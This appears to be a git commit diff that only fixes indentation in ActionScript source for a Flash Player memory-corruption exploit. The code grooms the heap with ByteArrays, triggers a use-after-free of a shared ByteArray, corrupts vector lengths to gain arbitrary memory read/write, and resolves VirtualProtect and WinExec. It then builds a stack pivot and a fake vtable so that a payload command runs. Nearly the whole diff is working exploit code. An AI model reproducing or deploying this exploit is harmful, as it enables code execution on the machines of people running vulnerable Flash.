Fix as indentation
parent
d773f85dca
commit
b07a864416
|
@ -47,12 +47,12 @@ package
|
|||
|
||||
this.initialize_worker_and_ba()
|
||||
if (!this.trigger())
|
||||
{
|
||||
return
|
||||
}
|
||||
{
|
||||
return
|
||||
}
|
||||
|
||||
var index:uint = search_uint_vector(114, 0x40000000)
|
||||
if (index == 0xffffffff) {
|
||||
var index:uint = search_uint_vector(114, 0x40000000)
|
||||
if (index == 0xffffffff) {
|
||||
return
|
||||
}
|
||||
|
||||
|
@ -96,7 +96,7 @@ package
|
|||
this.uv[0] = 0xfeedbabe
|
||||
//index = search_uint_vector(0xffffffff, 114)
|
||||
index = search_uint_vector(0x40000000, 114)
|
||||
if (index == 0xffffffff) {
|
||||
if (index == 0xffffffff) {
|
||||
return
|
||||
}
|
||||
|
||||
|
@ -104,40 +104,40 @@ package
|
|||
var winmm:uint = module("winmm.dll", flash)
|
||||
var kernel32:uint = module("kernel32.dll", winmm)
|
||||
var virtualprotect:uint = procedure("VirtualProtect", kernel32)
|
||||
var winexec:uint = procedure("WinExec", kernel32)
|
||||
var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash)
|
||||
var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash)
|
||||
|
||||
// Continuation of execution
|
||||
byte_write(buffer + 0x10, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable
|
||||
byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main
|
||||
byte_write(0, "\x89\x03", false) // mov [ebx], eax
|
||||
byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
|
||||
var winexec:uint = procedure("WinExec", kernel32)
|
||||
var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash)
|
||||
var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash)
|
||||
|
||||
// Put the payload (command) in memory
|
||||
byte_write(payload_address + 8, payload, true); // payload
|
||||
|
||||
// Put the fake vtabe / stack on memory
|
||||
byte_write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
|
||||
byte_write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
|
||||
byte_write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
|
||||
byte_write(0, virtualprotect)
|
||||
// Continuation of execution
|
||||
byte_write(buffer + 0x10, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable
|
||||
byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main
|
||||
byte_write(0, "\x89\x03", false) // mov [ebx], eax
|
||||
byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
|
||||
|
||||
// VirtualProtect
|
||||
byte_write(0, winexec)
|
||||
byte_write(0, buffer + 0x10)
|
||||
byte_write(0, 0x1000)
|
||||
byte_write(0, 0x40)
|
||||
byte_write(0, buffer + 0x8) // Writable address (4 bytes)
|
||||
// Put the payload (command) in memory
|
||||
byte_write(payload_address + 8, payload, true); // payload
|
||||
|
||||
// WinExec
|
||||
byte_write(0, buffer + 0x10)
|
||||
byte_write(0, payload_address + 8)
|
||||
byte_write(0)
|
||||
// Put the fake vtabe / stack on memory
|
||||
byte_write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
|
||||
byte_write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
|
||||
byte_write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
|
||||
byte_write(0, virtualprotect)
|
||||
|
||||
byte_write(main, stack_address + 0x18000) // overwrite with fake vtable
|
||||
|
||||
toString() // call method in the fake vtable
|
||||
// VirtualProtect
|
||||
byte_write(0, winexec)
|
||||
byte_write(0, buffer + 0x10)
|
||||
byte_write(0, 0x1000)
|
||||
byte_write(0, 0x40)
|
||||
byte_write(0, buffer + 0x8) // Writable address (4 bytes)
|
||||
|
||||
// WinExec
|
||||
byte_write(0, buffer + 0x10)
|
||||
byte_write(0, payload_address + 8)
|
||||
byte_write(0)
|
||||
|
||||
byte_write(main, stack_address + 0x18000) // overwrite with fake vtable
|
||||
|
||||
toString() // call method in the fake vtable
|
||||
}
|
||||
|
||||
final private function initialize_worker_and_ba():Boolean{
|
||||
|
@ -147,57 +147,57 @@ package
|
|||
this.ba.writeUnsignedInt(0xdeedbeef)
|
||||
this.ba.position = 0
|
||||
|
||||
this.shared_ba = new ByteArray()
|
||||
this.shared_ba.shareable = true
|
||||
this.shared_ba.endian = Endian.LITTLE_ENDIAN
|
||||
this.shared_ba.writeUnsignedInt(252536)
|
||||
this.shared_ba.writeUnsignedInt(16777216)
|
||||
|
||||
this.confuse_length_ba = new ByteArray()
|
||||
this.confuse_length_ba.length = 0x2000
|
||||
this.confuse_length_ba.endian = Endian.LITTLE_ENDIAN
|
||||
this.fill_byte_array(this.confuse_length_ba, 0xAAAAAAAA)
|
||||
|
||||
this.fake_ba = new ByteArray();
|
||||
this.fake_ba.endian = Endian.LITTLE_ENDIAN;
|
||||
|
||||
this.worker = WorkerDomain.current.createWorker(loaderInfo.bytes);
|
||||
return true;
|
||||
this.shared_ba = new ByteArray()
|
||||
this.shared_ba.shareable = true
|
||||
this.shared_ba.endian = Endian.LITTLE_ENDIAN
|
||||
this.shared_ba.writeUnsignedInt(252536)
|
||||
this.shared_ba.writeUnsignedInt(16777216)
|
||||
|
||||
this.confuse_length_ba = new ByteArray()
|
||||
this.confuse_length_ba.length = 0x2000
|
||||
this.confuse_length_ba.endian = Endian.LITTLE_ENDIAN
|
||||
this.fill_byte_array(this.confuse_length_ba, 0xAAAAAAAA)
|
||||
|
||||
this.fake_ba = new ByteArray();
|
||||
this.fake_ba.endian = Endian.LITTLE_ENDIAN;
|
||||
|
||||
this.worker = WorkerDomain.current.createWorker(loaderInfo.bytes);
|
||||
return true;
|
||||
}
|
||||
|
||||
final private function trigger():Boolean{
|
||||
// Memory massaging
|
||||
// 1. Create ByteArray's of 0x2000 lenght and mark one of them (hole_ba)
|
||||
this.fill_byte_array_vector();
|
||||
// 2. Clear the marked ByteArray
|
||||
this.fill_byte_array_vector();
|
||||
// 2. Clear the marked ByteArray
|
||||
this.hole_ba.clear();
|
||||
|
||||
|
||||
// The shared_ba should be left in "shared" state
|
||||
this.worker.setSharedProperty("fnfre", this.shared_ba)
|
||||
this.worker.setSharedProperty("vfhrth", this.confuse_length_ba)
|
||||
this.worker.setSharedProperty("vfhrth", this.shared_ba)
|
||||
|
||||
// fake_ba *data* is going to fill the space freed from the hole
|
||||
this.fake_ba.length = 0x2000;
|
||||
this.fill_byte_array(this.fake_ba, 0xBBBBBBBB);
|
||||
|
||||
this.fake_ba.length = 0x2000;
|
||||
this.fill_byte_array(this.fake_ba, 0xBBBBBBBB);
|
||||
|
||||
// Trigger the vulnerability, if the memory layout is good enough
|
||||
// the (freed) hole_ba metadata will end being the shared_ba metadata...
|
||||
this.shared_ba.uncompress()
|
||||
|
||||
this.shared_ba.uncompress()
|
||||
|
||||
// So its size should be 0x2000
|
||||
if (this.shared_ba.length != 0x2000)
|
||||
{
|
||||
return false
|
||||
}
|
||||
|
||||
// Free the fake_ba and make holes on the ByteArray's
|
||||
// allocated on massaging.
|
||||
this.free_fake_and_make_holes()
|
||||
|
||||
// Fill the holes and the fake_ba data space with
|
||||
// <uint> vectors
|
||||
this.fill_with_vectors()
|
||||
{
|
||||
return false
|
||||
}
|
||||
|
||||
// Free the fake_ba and make holes on the ByteArray's
|
||||
// allocated on massaging.
|
||||
this.free_fake_and_make_holes()
|
||||
|
||||
// Fill the holes and the fake_ba data space with
|
||||
// <uint> vectors
|
||||
this.fill_with_vectors()
|
||||
|
||||
// Hopefully the shared_ba metadata, product of the vulnerability
|
||||
// at this moment point to the <uint> vectors in memory =) it means
|
||||
|
@ -205,17 +205,17 @@ package
|
|||
var pwn_test:uint;
|
||||
this.shared_ba.position = 0;
|
||||
pwn_test = this.shared_ba.readUnsignedInt();
|
||||
|
||||
if (pwn_test == 0xBBBBBBBB)
|
||||
{
|
||||
return false
|
||||
}
|
||||
|
||||
return true;
|
||||
|
||||
if (pwn_test == 0xBBBBBBBB)
|
||||
{
|
||||
return false
|
||||
}
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
final private function fill_byte_array(local_ba:ByteArray, value:int):void{
|
||||
var i:int;
|
||||
var i:int;
|
||||
local_ba.position = 0;
|
||||
i = 0;
|
||||
while (i < (local_ba.length / 4))
|
||||
|
@ -227,28 +227,28 @@ package
|
|||
}
|
||||
|
||||
final private function fill_byte_array_vector():void{
|
||||
var i:int;
|
||||
var local_ba:ByteArray;
|
||||
this.byte_array_vector = new Vector.<Object>(this.byte_array_vector_length)
|
||||
var i:int;
|
||||
var local_ba:ByteArray;
|
||||
this.byte_array_vector = new Vector.<Object>(this.byte_array_vector_length)
|
||||
|
||||
i = 0;
|
||||
|
||||
while (i < this.byte_array_vector_length)
|
||||
{
|
||||
i = 0;
|
||||
|
||||
while (i < this.byte_array_vector_length)
|
||||
{
|
||||
local_ba = new ByteArray();
|
||||
this.byte_array_vector[i] = local_ba;
|
||||
local_ba.endian = Endian.LITTLE_ENDIAN;
|
||||
i++;
|
||||
}
|
||||
|
||||
var hole_index:int = this.byte_array_vector_length * 4 / 5;
|
||||
if (hole_index % 2 == 0)
|
||||
{
|
||||
hole_index++;
|
||||
}
|
||||
}
|
||||
|
||||
for(i = 0; i < this.byte_array_vector_length; i++)
|
||||
{
|
||||
var hole_index:int = this.byte_array_vector_length * 4 / 5;
|
||||
if (hole_index % 2 == 0)
|
||||
{
|
||||
hole_index++;
|
||||
}
|
||||
|
||||
for(i = 0; i < this.byte_array_vector_length; i++)
|
||||
{
|
||||
local_ba = this.byte_array_vector[i] as ByteArray
|
||||
local_ba.length = 0x2000
|
||||
this.fill_byte_array(local_ba, 0xCCCCCCCC)
|
||||
|
@ -260,65 +260,65 @@ package
|
|||
{
|
||||
this.hole_ba = local_ba;
|
||||
}
|
||||
}
|
||||
|
||||
return;
|
||||
}
|
||||
}
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
final private function free_fake_and_make_holes():void {
|
||||
var i:int
|
||||
var clear_ba:ByteArray
|
||||
var hole_index:int = this.byte_array_vector_length * 4 / 5
|
||||
|
||||
if (hole_index % 2 == 0)
|
||||
{
|
||||
hole_index++;
|
||||
}
|
||||
|
||||
for (i = 0; i < this.byte_array_vector_length; i++)
|
||||
{
|
||||
if (i == hole_index) {
|
||||
this.fake_ba.clear();
|
||||
} else {
|
||||
if (i % 2 == 1)
|
||||
{
|
||||
clear_ba = this.byte_array_vector[i] as ByteArray
|
||||
var i:int
|
||||
var clear_ba:ByteArray
|
||||
var hole_index:int = this.byte_array_vector_length * 4 / 5
|
||||
|
||||
if (hole_index % 2 == 0)
|
||||
{
|
||||
hole_index++;
|
||||
}
|
||||
|
||||
for (i = 0; i < this.byte_array_vector_length; i++)
|
||||
{
|
||||
if (i == hole_index) {
|
||||
this.fake_ba.clear();
|
||||
} else {
|
||||
if (i % 2 == 1)
|
||||
{
|
||||
clear_ba = this.byte_array_vector[i] as ByteArray
|
||||
this.fill_byte_array(clear_ba, 0xDDDDDDDD)
|
||||
clear_ba.clear()
|
||||
}
|
||||
}
|
||||
}
|
||||
return
|
||||
}
|
||||
clear_ba.clear()
|
||||
}
|
||||
}
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
final private function fill_with_vectors():void {
|
||||
var i:uint;
|
||||
var uint_vector:Vector.<uint>;
|
||||
var objects:Vector.<Object>;
|
||||
this.object_vector = new Vector.<Object>(this.object_vector_length);
|
||||
|
||||
i = 0
|
||||
while (i < this.object_vector_length)
|
||||
{
|
||||
var i:uint;
|
||||
var uint_vector:Vector.<uint>;
|
||||
var objects:Vector.<Object>;
|
||||
this.object_vector = new Vector.<Object>(this.object_vector_length);
|
||||
|
||||
i = 0
|
||||
while (i < this.object_vector_length)
|
||||
{
|
||||
if (i % 2 == 0) {
|
||||
this.object_vector[i] = new Vector.<uint>()
|
||||
} else {
|
||||
this.object_vector[i] = new Vector.<Object>()
|
||||
}
|
||||
i++
|
||||
}
|
||||
|
||||
i = 0
|
||||
while (i < this.object_vector_length)
|
||||
{
|
||||
i++
|
||||
}
|
||||
|
||||
i = 0
|
||||
while (i < this.object_vector_length)
|
||||
{
|
||||
if (i % 2 == 0) {
|
||||
uint_vector = this.object_vector[i] as Vector.<uint>;
|
||||
uint_vector = this.object_vector[i] as Vector.<uint>
|
||||
uint_vector.length = 114
|
||||
uint_vector[0] = 0xfeedbabe
|
||||
uint_vector[1] = i;
|
||||
uint_vector[1] = i
|
||||
uint_vector[2] = 0xbabeface
|
||||
} else {
|
||||
objects = this.object_vector[i] as Vector.<Object>;
|
||||
objects = this.object_vector[i] as Vector.<Object>
|
||||
objects.length = 114
|
||||
objects[0] = this.ba
|
||||
objects[1] = i
|
||||
|
@ -326,12 +326,12 @@ package
|
|||
objects[3] = this.stack
|
||||
objects[4] = this.payload_space
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
i++
|
||||
}
|
||||
}
|
||||
|
||||
// Use the corrupted shared_ba to search and corrupt the uint vector
|
||||
// Returns the offset to the *length* of the corrupted vector
|
||||
// Use the corrupted shared_ba to search and corrupt the uint vector
|
||||
// Returns the offset to the *length* of the corrupted vector
|
||||
private function search_uint_vector(old_length:uint, new_length:uint):uint {
|
||||
this.shared_ba.position = 0
|
||||
var i:uint = 0
|
||||
|
@ -357,7 +357,7 @@ package
|
|||
}
|
||||
i = i + 4
|
||||
}
|
||||
return 0xffffffff;
|
||||
return 0xffffffff
|
||||
}
|
||||
|
||||
// Use the corrupted shared_ba to disclose its own address
|
||||
|
@ -376,7 +376,7 @@ package
|
|||
} else {
|
||||
address = address - 0x30
|
||||
}
|
||||
|
||||
|
||||
return address
|
||||
}
|
||||
|
||||
|
@ -394,24 +394,24 @@ package
|
|||
}
|
||||
|
||||
// Methods to use the corrupted uint vector
|
||||
|
||||
|
||||
private function vector_write(addr:uint, value:uint = 0):void
|
||||
{
|
||||
var pos:uint = 0
|
||||
|
||||
|
||||
if (addr > this.uv[0]) {
|
||||
pos = ((addr - this.uv[0]) / 4) - 2
|
||||
} else {
|
||||
pos = ((0xffffffff - (this.uv[0] - addr)) / 4) - 1
|
||||
}
|
||||
|
||||
|
||||
this.uv[pos] = value
|
||||
}
|
||||
|
||||
private function vector_read(addr:uint):uint
|
||||
{
|
||||
var pos:uint = 0
|
||||
|
||||
|
||||
if (addr > this.uv[0]) {
|
||||
pos = ((addr - this.uv[0]) / 4) - 2
|
||||
} else {
|
||||
|
@ -422,7 +422,7 @@ package
|
|||
}
|
||||
|
||||
// Methods to use the corrupted byte array for arbitrary reading/writing
|
||||
|
||||
|
||||
private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void
|
||||
{
|
||||
if (addr) ba.position = addr
|
||||
|
@ -447,7 +447,7 @@ package
|
|||
}
|
||||
|
||||
// Methods to search the memory with the corrupted byte array
|
||||
|
||||
|
||||
private function base(addr:uint):uint
|
||||
{
|
||||
addr &= 0xffff0000
|
||||
|
@ -481,7 +481,7 @@ package
|
|||
var addressOfFunctions:uint = addr + byte_read(eat + 0x1c)
|
||||
var addressOfNames:uint = addr + byte_read(eat + 0x20)
|
||||
var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24)
|
||||
|
||||
|
||||
for (var i:uint = 0; ; i++) {
|
||||
var entry:uint = byte_read(addressOfNames + i * 4)
|
||||
ba.position = addr + entry
|
||||
|
|
Loading…
Reference in New Issue